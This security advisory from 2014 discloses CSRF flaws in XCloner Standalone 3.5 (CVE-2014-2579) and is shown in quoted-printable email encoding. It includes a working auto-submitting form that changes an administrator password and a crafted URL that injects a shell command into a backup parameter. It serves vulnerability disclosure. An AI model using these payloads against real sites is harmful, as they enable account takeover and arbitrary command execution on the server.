Advisory ID: HTB23207 Product: XCloner Standalone Vendor: XCloner Vulnerable Version(s): 3.5 and probably prior Tested Version: 3.5 Advisory Publication: March 14, 2014 [without technical details] Vendor Notification: March 14, 2014=20 Public Disclosure: April 9, 2014=20 Vulnerability Type: Cross-Site Request Forgery [CWE-352] CVE Reference: CVE-2014-2579 Risk Level: High=20 CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in XCloner = Standalone, which can be exploited to perform =D0=A1ross-Site Request Forge= ry (CSRF) attacks and gain complete control over the website. 1. =D0=A1ross-Site Request Forgery (CSRF) in XCloner Standalone: CVE-2014-2= 579 1.1 The vulnerability exists due to insufficient validation of HTTP request= origin. A remote attacker can trick a logged-in administrator to visit a s= pecially crafted webpage and change administrator=E2=80=99s password. The exploitation example below changes password for user 'login' to 'immuni= web': <form action=3D"http://[host]/index2.php" method=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"jcuser" value=3D"login"> <input type=3D"hidden" name=3D"jcpass" value=3D"password"> <input type=3D"hidden" name=3D"option" value=3D"com_cloner"> <input type=3D"hidden" name=3D"task" value=3D"config"> <input type=3D"hidden" name=3D"action" value=3D"save"> <script> document.main.submit(); </script> </form> 1.2 The vulnerability exists due to insufficient validation of HTTP request= origin. A remote attacker can trick a logged-in administrator to visit a s= pecially crafted webpage and execute arbitrary system commands on vulnerabl= e system with privileges of the webserver. The exploitation example below uses the 'echo' system command to write 'imm= uniweb' string into file '/var/www/file.php': http://[host]/index2.php?option=3Dcom_cloner&task=3Dgenerate&bname=3D1&dbba= ckup=3D1&cron_access=3D1&dbbackup_comp=3D||%20echo immuniweb > /var/www/fil= e.php%20|| Successful exploitation of this vulnerability requires that options 'enable= _db_backup' and 'sql_mem' are enabled in application=E2=80=99s configurati= on file. ---------------------------------------------------------------------------= -------------------- Solution: Vendor ignored: - 6 notifications by email - 4 notifications via contact form - 1 notification via twitter.=20 Currently we are not aware of any official solution for this vulnerability= =2E As a temporary solution it is recommended to remove the vulnerable scri= pt or restrict access to it via WAF of .htaccess.=20 ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23207 - https://www.htbridge.com/advisory/= HTB23207 - =D0=A1ross-Site Request Forgery (CSRF) in XCloner Standalone. [2] XCloner Standalone - http://www.xcloner.com - XCloner is a professional= website Backup and Restore application designed to allow you to create saf= e complete backups of any PHP/Mysql website and to be able to restore them = anywhere. It works as a native Joomla backup component, as a native Wordpre= ss backup plugin and also as standalone PHP/Mysql backup application. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE - https://portal.htbridge.com/ - is High-Tech Bridge's = proprietary web application security assessment solution with SaaS delivery= model that combines manual and automated vulnerability testing. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.